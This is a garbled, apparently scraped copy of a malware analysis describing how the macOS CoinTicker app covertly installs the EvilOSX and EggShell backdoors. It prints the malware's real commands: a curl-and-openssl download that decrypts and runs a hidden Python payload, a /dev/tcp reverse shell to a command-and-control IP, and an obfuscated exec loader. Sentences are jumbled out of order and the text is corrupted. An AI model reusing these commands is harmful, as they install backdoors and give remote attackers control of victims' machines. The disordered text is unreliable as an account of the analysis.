"""Minimal bot which loads modules as they are needed from the server.""" TjO1GlH1+7cP7pDYa8ykBquk4WhU0/UqE' | openssl aes-256-cbc -A -d -a -k %s -md md5" % get_uid()).readlines()))Įxtracting the script reveals that it is the bot.py script from the EvilOSX backdoor made by Github user Marten4n6. Return "".join(x.encode("hex") for x in (getpass.getuser() + "-" + str(uuid.getnode())))Įxec("".join(os.popen("echo 'U2FsdGVkX19GsbCj4lq2hzo27vqseHTtKbNTx9 (We believe these names are randomized, but unfortunately the CoinTicker app has stopped functioning, so we have been unable to confirm.) This script is encoded to hide the content: #!/usr/bin/env python UpQZdhkKfCdSYxg, which is home to a Python script named plQqVfeJvGo.
Coin tick mac software#
The software also creates a folder within the user’s Containers folder named. If it seems like this results in the espl binary being launched multiple times, that is indeed the case. Nohup curl -k -L -o /tmp/.info.enc openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq python /tmp/.info.py ist, that runs the same command periodically: The CoinTicker app also creates a user launch agent, named. Next, it downloads the the EggShell mach-o binary, saving it to /tmp/espl: curl -k -L -o /tmp/espl įinally, it creates and runs a shell script at /tmp/.server.sh, which also establishes a reverse shell. (The domain resolves to this IP address.) First it opens a reverse shell connection to a command & control server, using the following command: nohup bash &> /dev/tcp/94.156.189.77/2280 0>&1 Finally, it executes the resulting Python script. Next, it uses openssl to decode that file into a hidden Python file named. The first part of the command downloads an encoded file from a Github page belonging to a user named “youarenick” and saves that file to a hidden file named.
Coin tick mac download#
The app executes the following shell command to download a custom-compiled version of the EggShell server for macOS: nohup curl -k -L -o /tmp/.info.enc openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py -k 111111qq python /tmp/.info.py When launched, however, the app downloads and installs components of two different open-source backdoors: EvilOSX and EggShell. Without any signs of trouble, such as requests for authentication to root, there’s nothing to suggest to the user that anything is wrong. The app’s preferences allow the user to customize the display, showing information about a wide variety of cryptocurrencies, including Bitcoin, Etherium, and Monero.Īlthough this functionality seems to be legitimate, the app is actually up to no good in the background, unbeknownst to the user. Once downloaded, the app displays an icon in the menu bar that gives information about the current price of Bitcoin. The CoinTicker app, on the surface, appears to be a legitimate application that could potentially be useful to someone who has invested in cryptocurrencies. It seems that the app is covertly installing not just one but two different backdoors.
An astute contributor to our forums going by the handle 1vladimir noticed that an app named CoinTicker was exhibiting some fishy behavior over the weekend.
0 kommentar(er)
